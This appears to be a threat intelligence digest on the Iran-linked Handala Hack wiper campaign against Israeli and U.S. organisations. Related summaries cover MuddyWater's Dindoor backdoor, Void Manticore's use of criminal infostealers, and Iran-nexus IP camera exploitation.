Iran-Linked Handala Hack Wiper Campaign Against Israeli and U.S. Organizations
Handala Hack, an online persona tied to Void Manticore and assessed by multiple researchers as linked to Iran’s Ministry of Intelligence and Security (MOIS), is being tracked for destructive intrusions involving wiper attacks and related hack-and-leak activity against organizations in Israel and the United States. Public reporting cited by Unit 42 says attackers gained access to corporate networks using legitimate user credentials, while recent tradecraft includes phishing, identity compromise, and abuse of administrative access through Microsoft Intune. Israel’s National Cyber Directorate warned that several incidents involved deletion of servers and workstations to disrupt operations, reinforcing concern that the current regional conflict is increasing the likelihood of further destructive cyber activity.
Technical reporting indicates the actor continues to favor hands-on-keyboard operations, multiple wiping methods, and a mix of custom and publicly available tooling. Check Point said newly observed techniques include use of NetBird for tunneling and an AI-assisted PowerShell script for wiping, while Blackpoint’s advisory highlighted a broader Iranian threat posture featuring credential theft, phishing, password spraying, remote management tools, and exfiltration utilities such as Rclone. The combined reporting points to a near-term risk of disruptive attacks focused on identity compromise, lateral movement, data theft, and system destruction, particularly for organizations with exposed services, weak privilege controls, or insufficiently protected administrative accounts.
Related Entities
Threat Actors
Malware
Organizations
Sources
Related Stories
Iran-linked MuddyWater intrusions and heightened retaliation risk after U.S.-Israeli strikes
Following the Feb. 28, 2026 U.S.-Israeli strikes on Iran, reporting indicates a **heightened risk of Iranian retaliatory cyber activity** against U.S. and allied organizations, with expected operations spanning **ransomware, DDoS (including as cover for deeper intrusions), data leaks from prior exfiltration, and aggressive social engineering** (e.g., fake job offers and malicious attachments). Likely target sets highlighted include **critical infrastructure**, **banking**, and environments involving **industrial control systems/PLCs**, with emphasis on disciplined execution of security fundamentals (patching, log review, and tighter email/attachment handling) rather than overreliance on automation. Separately, **MuddyWater** (*Seedworm*), an Iran-linked APT, was reported active in multiple U.S. organizations since early Feb. 2026, with activity increasing after the strikes. Symantec and Carbon Black researchers described targeting that included a **U.S. bank**, an **airport**, a **non-profit**, and the **Israel operation of a U.S. software company** supplying the defense/aerospace sector, and identified a previously unknown backdoor, **Dindoor**, observed in several victims; **Dindoor executes via `Deno`** (a JavaScript/TypeScript runtime). Commentary in the reporting also warned to assume potential **pre-positioning** in high-value targets and recommended proactive hunting for signs of persistent access before activation.
1 weeks ago
Iranian MOIS-Linked Threat Actors Increasingly Leverage Cybercrime Tools and Infrastructure
Check Point Research reported that **Iranian Ministry of Intelligence and Security (MOIS)-linked actors** are increasingly moving beyond simply *posing* as cybercriminals and are instead **directly engaging with the cybercrime ecosystem**—using criminal tooling, services, and operational models to support state objectives while complicating attribution. The activity is highlighted in operations tied to **Void Manticore** (including the *Handala Hack* persona) and **MuddyWater**, where researchers observed repeated overlaps with criminal tools and infrastructure, suggesting an affiliate-style or service-consumption model that improves resilience and capability. Reporting on the research noted that **Void Manticore** has incorporated the commercially sold infostealer **Rhadamanthys** (marketed on cybercrime forums) into campaigns, including phishing activity targeting Israeli entities; the infostealer has been paired with custom wipers and lure themes such as impersonated **F5 updates** and even messages spoofing the **Israeli National Cyber Directorate (INCD)**. The same coverage reiterated that **MuddyWater** continues MOIS-aligned espionage activity and is also associated with cybercrime-style tooling and services, reinforcing the assessment that Iranian state operators are increasingly blending state tradecraft with criminal malware, infrastructure, and monetized services rather than relying solely on false-flag “ransomware” or hacktivist branding.
6 days ago
Iran-Linked Cyber Activity Escalates Amid Middle East Conflict
Iran-nexus cyber activity intensified alongside regional military escalation, with multiple reporting streams describing both opportunistic and targeted operations. Check Point Research observed a coordinated campaign to compromise internet-connected **IP cameras** across Israel, the UAE, Qatar, Bahrain, Kuwait, Lebanon, and Cyprus, with spikes in exploitation attempts aligning to geopolitical events; activity was traced to infrastructure linked to Iran-nexus actors using commercial VPN exit nodes (e.g., *Mullvad*, *ProtonVPN*, *Surfshark*, *NordVPN*) and VPS infrastructure to mask origin, and the most targeted vendors were **Hikvision** and **Dahua**. Separately, Symantec reported **Seedworm** (*MuddyWater/Temp Zagros/Static Kitten*) activity on multiple U.S. and Canadian organizations beginning in February 2026, including a U.S. bank, airport, non-profit, and the Israeli operations of a U.S. software supplier to defense/aerospace; Symantec identified a previously unknown backdoor dubbed **Dindoor** (leveraging the *Deno* runtime) and a Python backdoor **Fakeset**, with malware signed using certificates issued to “**Amy Cherne**” (and in some cases “**Donald Gay**”), and noted attempted data exfiltration using **Rclone** to a *Wasabi* cloud storage bucket. Additional coverage indicates broader pro-Iranian cyber activity but is less specific to the above intrusions. ASEC’s weekly “Ransom & Dark Web Issues” roundup flags **pro-Iranian/pro-Islamist hacktivist** attacks against Middle Eastern and pro-Western targets, but provides limited technical detail in the excerpt. A podcast episode describing “Iran’s 12 days of cyber war” and global OT targeting (including *Unitronics* PLCs) is largely commentary and retrospective framing rather than a discrete, verifiable incident report, and two other items in the set (a Russia-linked **APT28** phishing/malware campaign in Ukraine and a China-nexus **UAT-9244** telecom intrusion set in South America) describe unrelated threat activity outside the Iran-focused escalation.
5 days ago